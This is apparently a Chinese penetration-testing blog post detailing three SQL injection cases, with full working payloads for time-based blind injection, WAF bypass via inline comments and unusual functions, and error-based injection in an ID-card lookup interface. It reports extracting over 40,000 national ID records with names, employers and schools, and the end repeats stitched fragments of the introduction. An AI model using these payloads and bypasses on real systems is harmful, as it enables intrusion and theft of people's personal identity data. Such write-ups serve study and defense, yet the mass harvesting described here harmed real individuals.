SQL注入高级技巧与绕过方法详解<\/h1>

前言<\/h2>
SQL注入是渗透测试中常见的漏洞类型，本文总结了三种高级SQL注入案例，涉及多种绕过技术和注入方法，包括报错注入、时间盲注、子查询利用、函数绕过等技术。<\/p>

第一处SQL注入：日期参数注入<\/h2>

漏洞发现<\/h3>

注入点：日期参数<\/li>
初始测试：添加单引号导致报错<\/li>

报错信息分析：

date_format('2025-06-19 00:00:00','%Y-%m-%d %H:%M:%S')  \/\/ 正常
date_format('2025-06-19 00:00:00'','%Y-%m-%d %H:%M:%S') \/\/ 异常
<\/code><\/pre>
<\/li>
<\/ul>
注入尝试<\/h3>

初始闭合尝试：')#<\/code> 失败<\/li>
完整参数闭合尝试：','%Y-%m-%d %H:%M:%S') and extractvalue(1,concat(0x0a,(select user()),0x0a))#<\/code> 失败<\/li>
<\/ol>
问题分析<\/h3>

网站返回的是框架自定义报错，而非数据库原始报错<\/li>
需要转向时间盲注<\/li>
<\/ul>
时间盲注构造<\/h3>

直接时间盲注失败原因：前面条件可能为假导致不执行后续语句<\/li>
解决方案：使用子查询强制优先执行
and<\/span> (select<\/span> 0<\/span> from<\/span> (select<\/span> if<\/span>(ascii(substr(user<\/span>(),1<\/span>,1<\/span>))><\/span>1<\/span>,sleep(6<\/span>),1<\/span>))x))TOTAL#<\/span>
<\/span><\/span><\/code><\/pre>
子查询优先执行内部if语句<\/li>
即使外部条件为假也能触发延时<\/li>
<\/ul>
<\/li>
<\/ol>
最终Payload<\/h3>
2025-06-19 00:00:00','%Y-%m-%d %H:%M:%S') and (select 0 from (select if(ascii(substr(user(),1,1))>1,sleep(6),1))x))TOTAL#
<\/code><\/pre>
第二处SQL注入：严格过滤环境下的注入<\/h2>
初始发现<\/h3>

注入点：orderType参数<\/li>
测试：单引号报错，双引号正常<\/li>
过滤情况：几乎所有常见函数和绕过方法都被过滤<\/li>
<\/ul>
绕过技术<\/h3>

权限绕过：直接修改返回包false→true<\/li>
使用非常规函数：Y(point(56.7,53.34))<\/code>作为恒真条件<\/li>
空格绕过：使用\/**\/<\/code>代替空格<\/li>
内联注释绕过：\/*!55555*\/<\/code>作为版本号注释<\/li>
函数嵌套：right(left(user(),1),1)<\/code>增加复杂度<\/li>
Benchmark延时：benchmark(511111111,1)<\/code><\/li>
<\/ol>
最终Payload<\/h3>
orderType=1%20or%20Y(point(56.7,53.34))%20or%20(select\/**\/0\/**\/from\/**\/(select\/**\/if((ascii(right(left(user\/*!55555*\/(),1),1))!=1),(select\/*!55555555555555555*\/benchmark(511111111,1)),1))x)
<\/code><\/pre>
技术要点<\/h3>

使用子查询确保注入语句优先执行<\/li>
内联注释绕过WAF对特定函数(如user(), benchmark())的检测<\/li>
函数嵌套增加复杂度避免简单匹配<\/li>
<\/ul>
第三处SQL注入：身份证查询接口注入<\/h2>
漏洞发现<\/h3>

注入点：tj参数(身份证查询条件)<\/li>
原始逻辑：sfzh='123123' and xm='12331'<\/code><\/li>
闭合方式：tj=sfzh=1#<\/code> → sfzh=1 and (注入语句) #<\/code><\/li>
<\/ul>
绕过技术<\/h3>

逻辑运算符绕过：使用||<\/code>代替被过滤的and\/or<\/code>

|| 1=1#<\/code> → 502错误<\/li>
|| 1=2#<\/code> → 正常返回<\/li>
<\/ul>
<\/li>
报错注入函数绕过：

使用反引号分隔函数名：extractvalue`(1, `concat`(0x0a,version()))<\/code><\/li>
<\/ul>
<\/li>
user()函数绕过：使用current_user<\/code>替代<\/li>
模糊查询绕过单引号过滤：

原始：sfzh like '1%'<\/code><\/li>
绕过：使用16进制编码0x3225<\/code>表示'2%'<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
敏感信息查询技术<\/h3>
sfzh like<\/span> 0<\/span>x3225  -- 查询身份证号以2开头的记录
<\/span><\/span><\/span><\/code><\/pre>
成功获取身份证、姓名、单位、学校等敏感信息<\/li>
通过变更前缀数字获取约4w+条身份证数据<\/li>
<\/ul>
关键知识点总结<\/h2>


子查询利用<\/strong>：<\/p>

确保注入语句优先执行<\/li>
绕过条件判断依赖问题<\/li>
<\/ul>
select<\/span> 0<\/span> from<\/span> (select<\/span> if<\/span>(条件<\/span>,sleep(6<\/span>),1<\/span>))x
<\/span><\/span><\/code><\/pre><\/li>

严格过滤环境绕过<\/strong>：<\/p>

内联注释：\/*!55555*\/<\/code><\/li>
函数嵌套：right(left(user(),1),1)<\/code><\/li>
非常规函数：Y(point())<\/code><\/li>
空格替代：\/**\/<\/code><\/li>
<\/ul>
<\/li>

报错注入绕过<\/strong>：<\/p>

反引号分隔函数名<\/li>
替代函数使用(current_user代替user())<\/li>
<\/ul>
<\/li>

模糊查询绕过<\/strong>：<\/p>

16进制编码代替字符串<\/li>
避免单引号过滤<\/li>
<\/ul>
<\/li>

时间盲注要点<\/strong>：<\/p>

确保注入语句能被执行<\/li>
使用benchmark或sleep<\/li>
考虑执行优先级问题<\/li>
<\/ul>
<\/li>
<\/ol>
这些高级SQL注入技术展示了在复杂过滤环境下的多种绕过思路，对渗透测试人员具有重要参考价值。<\/p>

SQL注入高级技巧与绕过方法详解<\/h1>

前言<\/h2> SQL注入是渗透测试中常见的漏洞类型，本文总结了三种高级SQL注入案例，涉及多种绕过技术和注入方法，包括报错注入、时间盲注、子查询利用、函数绕过等技术。<\/p>

第一处SQL注入：日期参数注入<\/h2>

第二处SQL注入：严格过滤环境下的注入<\/h2>

第三处SQL注入：身份证查询接口注入<\/h2>

前言<\/h2>
SQL注入是渗透测试中常见的漏洞类型，本文总结了三种高级SQL注入案例，涉及多种绕过技术和注入方法，包括报错注入、时间盲注、子查询利用、函数绕过等技术。<\/p>